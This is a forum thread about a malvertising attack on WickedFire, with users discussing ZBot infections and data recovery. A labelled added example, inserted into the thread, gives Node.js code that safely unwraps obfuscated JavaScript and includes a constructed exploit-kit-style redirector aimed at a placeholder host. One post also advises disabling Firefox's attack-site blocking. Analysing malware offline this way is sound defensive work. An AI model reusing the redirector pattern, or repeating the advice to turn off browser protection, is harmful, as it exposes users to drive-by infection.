WickedFire forum, Shooting The Shit

#51
PedoBeard
So in the end, who/what is responsible for the exploit?

#60
Senior Member
Would be great to get a few more details about how this was done and whether you could implicate anyone. If this was really through the Maserati banner, shit, I'm also running ads and I don't want mine to lead to malware warnings! Were these ads running through a network? Who is ads.is?

#63
Was blocked all night last night in Firefox and even if I chose to ignore the warning the site wouldn't load.

#64
it's a wig
Do you guys love WF so much that you just ignored the warning and came here anyway?
I saw that shit and I figured I could go a day w/o WF till it was fixed. Working for me now....

#66
Junior Member
Doesn't anyone here find it weird that the admins aren't telling us how they are affiliated with the group whose exploit was running? Or that they didn't explain the risks (how infection occurs: via just loading the ad and viewing it, or if one has to click on the ad, or what)? Or that they don't offer any other info on it? Just a quick "oh, it was fixed, let's move on now, nothing to see".

#68
Photoshop God
Temporary fix
Firefox - Preferences -> Security -> uncheck "Block reported attack sites"

#69
It's a pain in the ass to track. If I go by the IP ranges, they're delivering the ZBot/Zeus trojan. If I go by whois information, they're using an exploit delivery mechanism written by someone nicknamed ExManoize. The whois information is fake but non-private, and has been used in a lot of similar drive-by exploits and fake antivirus software. The IP ranges are definitely bulletproof hosting, but once again are from Eastern Europe, so best of luck there. Most trails go dead in Serbia or Mother Russia.

The first script (included here) writes a script to another location. That script builds up a browser profile, then redirects to the exploit for the browser. All the JavaScript is encrypted. If you want to see the code that runs the "end-script", I saved a (cleaned) copy here: //THIS CODE WILL RUNS UNKNOWN - Anonymous - zBHKyydY - Pastebin.com. Visiting that with Avast will still set off your antivirus, but it's not active and I swapped out the domain.

One method of infection is a Java class. Also apparent in the code is the fact that they can write to the C drive, and that they somehow gained access to the "ShellExecute" command, which more or less means the exploit can do whatever the fuck it wants.

Paranoid twats. Everyone except for me was working on getting the infection OFF the forum so fewer people would get infected rather than trying to track down who did it. That's why you didn't get much information.

Edit: If you want to fuck around with that JavaScript I posted, GO OFFLINE BEFORE YOU EXECUTE IT. I'm unsure how functional that piece is, but it's a pain in the ass to tell what was successfully disabled. Also, one alert() in that script should actually be an eval; I forgot to change it back.

#70
Senior Member
I had my antivirus off; it loaded on my computer and kept redirecting my browser to infoprotector.net.
I had to remove it from my registry, which was a pain in the ass because it disables regedit. What a fucking pain in the ass lol. Got rid of it; if you can't, hit me up and I'll show you how.

#71
Junior Member
Apologies

Quote: Paranoid twats. Everyone except for me was working on getting the infection OFF the forum so fewer people would get infected rather than trying to track down who did it. That's why you didn't get much information.

I'm sorry, and I understand that, but the biggest detail missing for everyone, and one I think still hasn't been clearly answered, is: does it infect your machine by simply loading a page which was displaying the ad, or does it require you to click on the ad/follow the link? Because if no interaction (click-through) with the ad is required, and merely having it displayed on a page suffices for infection, then even though I run AV software, I and most likely others are infected and we need to take a closer look at our systems.

#72
If your browser locked up when you visited Wickedfire, I'd run a full system scan before boot time. If not, I'd run some kind of scan at least just to be safe. This is the kind of thing your computer probably encounters quite frequently though.

#73
Senior Member
I'd be curious how this was delivered. Did they inject JS code into WickedFire? How? Specifically targeting a weakness in WF? Through the banner? Was there an ad network involved and if so, were they also attacked and compromised or were they knowingly part of the scheme?

#75
It's hard to say if this could infect Macs. The way these systems work is they have decent-sized pre-defined lists of exploits broken up by browser and OS. There isn't necessarily an exploit for every browser on every OS (and my understanding is that in most cases it only affects Windows), but it could be set up for Mac. The JavaScript that executes is supposed to determine your browser/OS, then send you to the proper exploit to infect. They get a nice little control panel that shows each infection type and its success rate.

Script Kiddy 2.0

Edit: No ad networks involved.
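Added example, not code from the thread and not the script that was on the forum: posts #69 and #75 describe a staged loader whose JavaScript is obfuscated, builds a browser profile, and then redirects to whichever exploit matches the browser/OS, and #69 warns that simply running the saved copy is dangerous. The safe way to look at such a thing is to never let a stage execute: shadow eval() with a capture function so each decoded layer is logged and fed back in as the next input, and replace navigator/window/document with stubs that record what the script tried to do. The two-stage sample, the user-agent strings and the kit.example.invalid host below are constructed for this example; the code assumes Node.js.

```javascript
// Added example (not from the thread). Peel a staged, obfuscated redirector
// offline: every eval() the sample calls is captured instead of executed, and
// the browser objects are stubs that only log side effects.

// Constructed sample (NOT the forum's script). Stage 2 profiles the browser
// and picks a landing page per OS/browser; stage 1 only hides stage 2.
const STAGE2 = [
  'var ua = navigator.userAgent;',
  'var os = /Windows/.test(ua) ? "win" : /Mac OS/.test(ua) ? "mac" : "other";',
  'var br = /MSIE/.test(ua) ? "ie" : /Firefox/.test(ua) ? "ff" : "other";',
  'var base = "http://kit.example.invalid/go";', // placeholder host, assumed
  'if (os === "win") { window.location = base + "?b=" + br; }',
  'else { document.write("<!-- no exploit for " + os + " -->"); }',
].join("\n");
// escape() percent-encodes the stage-2 source; stage 1 unescape()s and eval()s it.
const STAGE1 = 'eval(unescape("' + escape(STAGE2) + '"));';

// Run one layer with eval shadowed by a capture function. A parameter named
// `eval` is enough: the language only treats eval(...) as a direct eval when
// the identifier resolves to the built-in %eval%, so the call lands on us.
function runLayer(code, userAgent, effects) {
  const captured = [];
  const navigator = { userAgent };
  const location = { href: "about:blank" };
  const document = { write: (html) => effects.push("document.write: " + html) };
  const window = {};
  Object.defineProperty(window, "location", {
    get: () => location,
    set: (url) => effects.push("navigate: " + url), // a real browser would navigate here
  });
  const captureEval = (src) => { captured.push(String(src)); return undefined; };
  try {
    // new Function() bodies are sloppy-mode, so `eval` is a legal parameter name.
    const fn = new Function("eval", "navigator", "window", "document", "location", code);
    fn(captureEval, navigator, window, document, location);
  } catch (err) {
    effects.push("error: " + err.message);
  }
  return captured;
}

// Peel layers until a stage stops calling eval (or the depth limit is hit).
// Returns every decoded layer plus the side effects the final stage attempted.
function peel(source, userAgent, maxDepth = 8) {
  const layers = [source];
  const effects = [];
  for (let depth = 0; depth < maxDepth; depth++) {
    const next = runLayer(layers[layers.length - 1], userAgent, effects);
    if (next.length === 0) break;
    layers.push(next.join("\n"));
  }
  return { layers, effects };
}

// Demonstration: replay the same sample under two constructed browser profiles.
const WIN_FF = "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0";
const MAC_SAFARI = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 Safari/534.55.3";
for (const ua of [WIN_FF, MAC_SAFARI]) {
  const r = peel(STAGE1, ua);
  console.log("UA: " + ua + "\nlayers: " + r.layers.length + "\neffects: " + JSON.stringify(r.effects) + "\n");
}
```

Replaying with several user agents is the point: a kit like the one described serves different targets different URLs, so a single run with your own browser profile tells you only about one branch. The stubs here cover what the constructed sample touches; a real saved script may reference other globals (setTimeout, top, XMLHttpRequest), which will surface as an "error:" entry rather than executing.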

#79
Affiliate Summit guy
Do you have the installed version, or is it hosted on OpenX servers?

#81
I had notifications turned off about this kind of thing because I've gotten false reports before, so I didn't notice it.

#83
newbie taking action
Anyway, seeing as how I am not technically savvy, after 24 hours of trying to fix the issue (I couldn't get online; the virus wouldn't let me open a single application) I ended up rebooting my computer and picking the wrong setting, and I wiped my entire computer out. My computer is now loaded back to the day I took it out of the box. I lost MONTHS of content and other things. I just got the ability to get online, and found this thread. I guess this is where I got this from? It happened yesterday about 6pm Eastern. -No Spell Check- I don't have Firefox reloaded yet.

#84
Member
Stop doing anything, and run some data recovery software ASAP. You definitely won't be able to recover everything, but it might be able to recover some files or parts of them. The more you use your computer, the less likely it'll be able to recover anything. When data gets deleted it isn't entirely gone yet; it is mostly still recoverable, unless it gets overwritten. So it really depends on the way your Windows has been restored whether or not you can recover anything. If it was a clean install you can forget recovering. I can't recommend any software brand for this though; it's been years since I last used it, but I once managed to recover quite a few files.

#85
Platinum Member
When I saw the warning I decided to go a day without WF. Surprised at how many people just ignored it.

#87
newbie taking action
I never got a warning. I use Firefox, and just always leave WF loaded on a tab. In fact, I blamed my wife for screwing up the computer, because it started happening while she was on the internet. I didn't know anything about this on WF until I got my computer reloaded and found this thread.

#88
When I posted the JavaScript the virus used into Pastebin, Avast even blocked me from accessing that Pastebin page... even though it couldn't execute. Quality shit. I also recommend you recover your files NOW http://www.snapfiles.com/downloadfin...h=Find+it&lc=1 . The longer you take to do it, the more old locations on the HD are overwritten, and the less you'll be able to recover.